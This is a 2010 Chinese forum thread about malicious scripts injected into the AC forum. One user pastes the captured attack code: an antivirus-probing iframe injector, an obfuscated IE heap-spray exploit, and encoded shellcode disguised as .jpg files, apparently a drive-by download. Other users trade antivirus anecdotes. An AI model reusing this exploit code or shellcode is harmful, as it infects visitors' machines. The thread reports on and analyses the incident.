打开AC所有链接都弹出木马攻击警告

不死狂龙

10:30左右已经处理好了
如果你们在9：35-10：00之间上了ac却没报毒，那恐怕需要更换杀毒软件了 ...
ustari 发表于 2010-5-25 10:58

    我刚刚上的，我用的是360全套，应该没问题。

luke99e3

刚才我也遇到了，估计是被人下黑手了。不过现在好了。

千年明月

一个小时前我打开网站，也提示挂马病毒，赶紧就关了，现在没有了。

一个小时前我打开网站，也提示挂马病毒，赶紧就关了，现在没有了。
千年明月 发表于 2010-5-25 11:50

    嗯，１０点３５分左右技术员就已经清除木马了。

liandao7

我刚刚上的，我用的是360全套，应该没问题。
不死狂龙 发表于 2010-5-25 11:04

   

用360时 机器中毒 被迫重装的路过

360除了会吓唬人以外 几乎没用

ustari

...晕  又被挂马勒

net2003

以下是访问论坛时监测到的所有链接，
其中有两个html文件是嵌入的frame，
三个jpg文件是的类型实际上是脚本。




index1.html:

1. <html>
   
2. <script language="javascript">
   
3. var now = new Date();
   
4. var miao =  now.getSeconds();
   
5. document.write("<\/BR>");
   
6. if (miao>25&&miao<80)
   
7. {
   
8. document.writeln("<script type="text\/javascript" src="http:\/\/js.tongji.linezing.com\/1676188\/tongji.js"><\/script><noscript><a href="http:\/\/www.linezing.com"><img src="http:\/\/img.tongji.linezing.com\/1676188\/tongji.gif"\/><\/a><\/noscript>");
   
9. }
   
10. 
    
11. </script>
    
12. 
    
13. 
    
14. <script>
    
15. function setCookie(name, value, expire) {   
    
16.   window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
    
17. }
    
18. 
    
19. function getCookie(Name) {   
    
20.    var search = Name + "=";
    
21.    if (window.document.cookie.length > 0) { // if there are any cookies
    
22.      offset = window.document.cookie.indexOf(search);
    
23.   if (offset != -1) { // if cookie exists
    
24.        offset += search.length;
    
25. // set index of beginning of value
    
26.     end = window.document.cookie.indexOf(";", offset)     
    
27. // set index of end of cookie value
    
28.     if (end == -1)
    
29.       end = window.document.cookie.length;
    
30.     return unescape(window.document.cookie.substring(offset, end));
    
31.      }
    
32.    }
    
33.    return null;
    
34. }
    
35. function register(name) {
    
36.   var today = new Date();
    
37.   var expires = new Date();
    
38.   expires.setTime(today.getTime() + 1000);
    
39.   setCookie("ItDoor", name, expires);
    
40. }
    
41. 
    
42. function openWin() {
    
43. 
    
44.   var c = getCookie("ItDoor");
    
45.   if (c != null) {
    
46.     return;
    
47.   }
    
48.   register("xiaolin");
    
49.    
    
50.    
    
51.         if(document.cookie.indexOf('hello')==-1)
    
52.         {        
    
53.         var expires=new Date();expires.setTime(expires.getTime()+1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString();
    
54.                 knownImg = {}
    
55.                 knownImg.resList = [
    
56.                 {id: 'safe', res: 'res://c:\\Program%20Files\\360\\360Safe\\repairleakdll.dll/GIF/154'},
    
57.                 {id: 'asafe', res: 'res://d:\\Program%20Files\\360\\360Safe\\repairleakdll.dll/GIF/154'},
    
58.                 {id: 'bsafe', res: 'res://c:\\Program%20Files\\360Safe\\live.dll/#2/#203'},
    
59.                 {id: 'csafe', res: 'res://d:\\Program%20Files\\360Safe\\live.dll/#2/#203'}
    
60.                 ];
    
61. 
    
62.                 knownImg.ok_resList = new Array();
    
63.                 knownImg.tmp_resList = new Array();
    
64. 
    
65.                 knownImg.checkSoft = function(){
    
66.                         if (document.all){
    
67.                                 x = new Array();
    
68.                                 for (i = 0; i < knownImg.resList.length; i++){
    
69.                                         x[i] = new Image();
    
70.                                         x[i].src = "";
    
71.                                         knownImg.ok_resList.push(knownImg.resList[i].id);
    
72. 
    
73.                                         x[i].onload = function(){
    
74.                                         //alert(knownImg.resList[i].id + ': return true');
    
75.                                         }
    
76. 
    
77.                                         x[i].onerror = function(){
    
78.                                         //alert(knownImg.resList[i].id + ': return false');
    
79.                                         knownImg.ok_resList.pop();
    
80.                                         }
    
81. 
    
82.                                         x[i].src = knownImg.resList[i].res;
    
83.                                 }
    
84.                         }
    
85.                 }
    
86.                 knownImg.checkSoft();
    
87. 
    
88. 
    
89.                 if(knownImg.ok_resList.length>0){
    
90.                 //alert(knownImg.ok_resList);
    
91.                 //document.write('你：<br />'+knownImg.ok_resList.join('<br />'));
    
92.                 }else{
    
93.                         //alert('没');
    
94. 
    
95.                
    
96. 
    
97. 
    
98.                         var NewWords;
    
99.                         NewWords = unescape("<iframe src=jk.html width=100 height=0></iframe>");
    
100.                         document.write(NewWords);
     
101.                         
     
102.                 }
     
103.         }
     
104. 
     
105.    
     
106. }
     
107. openWin();
     
108. </script>
     
109. 
     
110. </html>

复制代码

jk.html，使用了代码迷惑:

1. <SCRIPT LANGUAGE="JavaScript">
   
2. <!-- Hide
   
3. function killErrors() {
   
4. return true;
   
5. }
   
6. window.onerror = killErrors;
   
7. // -->
   
8. </SCRIPT>
   
9. <script src="pl.jpg"></script>
   
10. <script src="y1.jpg"></script>
    
11. <script src="tl.jpg"></script>
    
12. 
    
13. <BUTTON
    
14. id=PPSytytYYtTTyyutian
    
15. style="DISPLAY: none"
    
16. onclick=newTyPPSytytYYtTTyyutianAVpYyTt();></BUTTON>
    
17. <SCRIPT
    
18. language=javascript>
    
19. function
    
20. PPSytytYYtTTyyutianAVp(){
    
21. 
    
22. YtYtTyPPSytytYYtTTyyutianAVpYyTt
    
23. = new Array();
    
24. 
    
25. 
    
26. var
    
27. BIytKKTyPPSytytYYtTTyyutianAVpYyTt =
    
28. 0x86000-(PPSytytYYtTTyyutianAVpYyTt.length*2);
    
29. 
    
30. while(LFlwBa.length<BIytKKTyPPSytytYYtTTyyutianAVpYyTt/2)
    
31. { LFlwBa+=LFlwBa; }
    
32. var
    
33. youxiYTYTyyttYtTYyTian
    
34. =
    
35. LFlwBa.substring(0,BIytKKTyPPSytytYYtTTyyutianAVpYyTt/2);
    
36. delete
    
37. LFlwBa;
    
38. for(YTiancazaWaGa=0;
    
39. YTiancazaWaGa<270; YTiancazaWaGa++)
    
40.   
    
41. YtYtTyPPSytytYYtTTyyutianAVpYyTt[YTiancazaWaGa]
    
42. =
    
43. youxiYTYTyyttYtTYyTian
    
44. +
    
45. youxiYTYTyyttYtTYyTian
    
46. +
    
47. PPSytytYYtTTyyutianAVpYyTt;
    
48. 
    
49. }
    
50. function
    
51. newTyPPSytytYYtTTyyutianAVpYyTt(){
    
52. PPSytytYYtTTyyutianAVp();
    
53. var
    
54. yutYianYtAYtVP =
    
55. document.createElement('b'+'o'+'dy');
    
56. yutYianYtAYtVP.addBehavior('#default#userData');
    
57. document.appendChild(yutYianYtAYtVP);
    
58. try
    
59. {
    
60.   for (YTiancazaWaGa=0;
    
61. YTiancazaWaGa<10; YTiancazaWaGa++)
    
62. 
    
63. yutYianYtAYtVP.setAttribute('s',window);
    
64.   
    
65. 
    
66. } catch(e){ }
    
67. window.status+='';
    
68. }
    
69. 
    
70. document.getElementById('PPSytytYYtTTyyutian').onclick();
    
71. </SCRIPT>

复制代码

pl.jpg:

1.       try {
   
2.             new ActiveXObject("kaix");
   
3.       }
   
4.       catch (e) {
   
5. var ytpps="%uyt9yt2yt9yt2";
   
6. var UUse=(ytpps.replace(/yt/g,""));
   
7. 
   
8. var YTavp="%"+"yutianu"+"ByutianD"+"ByutianD"+"%"+"uB"+"D"+"ByutianD"+"%"+"u"+"B"+"D"+"ByutianD"+"%u"+"B"+"D"+"B"+"D"+"%u"+"BD"+"ByutianD"+"%u"+"ByutianD"+"BD"+"%u"+"BD"+"ByutianD"+"%u"+"BD"+"ByutianD"+"%u"+"EAEA";
   
9. var YTavp88=(YTavp.replace(/yutian/g,""));
   
10. var YTavp99="%u"+"54FF%uBEA3%uBDyutianBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1"+"%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%u"+"D5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uyutianBDBC%u36BD%uD7yutian55%uE4B8"+"%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u"+"7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355"+"%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%u"+"CED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4"+"%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%u"+"BDyutianD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44"+"%uBEB9%uE4E1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u"+"8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD"+"%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%u"+"BCBC%uBDBD%uFB34%uD7DD%uEDyutianBD%uEB42%u3495%uD9FB%uFB36%uD7DD"+"%uD7BD%uD7BD%uD7BD%uD7yutianB9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%u"+"BDA2%uByutianDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909"+"%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u"+"7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7yutianBD%uD7BD%uD7BD"+"%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%u"+"CB42%uEDCD%uCB42%u42DD%u8DEB%uCByutian42%u42DD%u89EB%uCB42%u42C5"+"%uFDEB%u4636%u7D8E%u66yutian8E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u"+"34Byutian5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED"+"%uEDEE%uEDyutianED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%"+"u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB"+"%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDyutianB9%uBDBD%u1D30%u42DD%u4242%"+"uD8D7%uCB42%u3681%uADyutianFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE"+"%u3D6D%u55yutian85%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u"+"36E8%u3051%uB8FD%u5D42%u1Byutian55%uBDBD%u7EBD%u1D55%uBDyutianBD%u0yutian5BD"+"%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u5yutian13C%uBCBD%uBDBD%u4136%"+"u7A3E%u7AB9%u8FBA%u2CyutianC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5"+"%u2AyutianD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%"+"uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A"+"%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD5yutian36%u"+"36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8yutianED5%uBD8F%uD5BD"+"%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%u"+"BDBD%u445F%u428E%u42yutianEA%uB9yutianEB%uBF56%u7EE5%u4455%u4242%uE642"+"%uBA7B%u3405%yutianuBCE2%u7ADB%uB8FA%u5D42%uEE7E%u61yutian36%uD7EE%uD5FD%u"+"ADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8"+"%uC93yutian6%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%yutianuBE10%u8E78%u"+"B266%uAD03%u6Byutian87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8"+"%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u36yutian60%u3yutian6B9%u78yutianBE%u"+"E316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5"+"%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%u"+"A376%uyutianD919%u2E5yutian2%u59yutian8F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230"+"%uEAC9%uByutian0DB%uFE42%u1103%uC066%u18yutian4D%uEF27%u1A43%u8367%u0ByutianA0%u0584%u69yutianD4%u03A6%uyutianDBC2%u411D%u8A14%u25yutian10%uyutianAyutianDB7%yutianu3D45%u12yutian6B"+"%u46"+"27%u"+"A8"+"EE";
    
11. var YTavp98=(YTavp99.replace(/yutian/g,""));
    
12. var LFlwBa = unescape('%'+'u'+'0c0c'+'%'+'u'+'0c0c');
    
13. }

复制代码

tl.jpg

1.       try {
   
2.             new ActiveXObject("kaix");
   
3.       }
   
4.       catch (e) {
   
5. 
   
6. var PPSytytYYtTTyyutianAVpYyTt=unescape(UUse+YTavp1+YTavp98+YTMTV+YTavp88);
   
7. }

复制代码

y1.jpg:

1.       try {
   
2.             new ActiveXObject("kaix");
   
3.       }
   
4.       catch (e) {
   
5. var YTMTV="%ud5db%uc9c9%u87cd%u9292%ucfda%udbda%u8e89%ud889%u93cf%u8585%u8d8d%ud293%udacf%u8587%u8485%u9284%u9285%ud3d9%ud893%ud8c5%uBDBD%uBDBD";
   
6. var YTavp123="%u58yutianayt58%u58yutianayt58%u10yutianaytEB%u4Byutianayt5B%uC9yutianayt33%uB9yutianayt66%u03yutianaytB8%u34yutianayt80%uBDyutianayt0B%uFAE2%u05yutianaytEB%uEByutianaytE8%uFFyutianaytFF";
   
7. var YTavp1=(YTavp123.replace(/yutianayt/g,""));
   
8. }

复制代码

红色的血

如图所示 帖子长度不够再加几个字

liandao7

哦 AC被挂马了

360就会吓人。。。其实只要屏蔽下8866.org这个动态域名就可以了。。360搞的怎么大架势。。。。


8866.org里大多数都是病毒木马之类的 屏蔽他没有多大影响的

小莲

遨游也提示了。。。

尹吝

高手！！膜拜中。

liandao7

遨游也提示了。。。
小莲 发表于 2010-5-25 21:11

    哦 那个我上午上报的。。。

凉夜清

瑞星防火墙也响了

小莲

现在360度也跳了，看来是被人恶意种木马了。。。

net2003

只是弄到疑似木马脚本的源码，这很容易，
也没有什么实际意义，
最多是证明确实有恶意脚本被注入论坛。

问题是这些个js脚本是从哪个位置挂进去的，就要麻烦管理员了。

逆卷炎灵

.t_msgfont, .t_msgfont td { font-size: 16px; } .postmessage h1, .postmessage h2 { font-size: 16px; }

=====

我的网页上面有行这个东西，没问题吧？

iseesee

现在好像又不提示了.

wangyf315

360是有后门的，建议用瑞星。

天马

我刚才也是裸奔上来就死IE了，用ArSwp和360系统急救箱后正常。

90hou

linux党毫无压力